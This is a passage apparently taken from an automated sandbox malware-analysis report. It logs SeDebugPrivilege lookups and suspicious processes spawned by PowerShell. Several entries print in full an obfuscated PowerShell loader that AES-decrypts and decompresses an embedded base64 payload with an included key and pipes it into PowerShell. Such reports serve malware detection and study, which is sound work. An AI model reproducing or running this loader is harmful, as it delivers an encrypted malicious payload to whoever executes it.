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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell - filepath: C:\Windows\System32\cmd.exe	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Dec. 7, 2022, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Dec. 7, 2022, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Dec. 7, 2022, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Windows\System32\cmd.exe /c powershell.exe $Ibhr = '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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell -
parent_process	powershell.exe				martian_process	"C:\Windows\system32\cmd.exe" /c powershell.exe $Ibhr = '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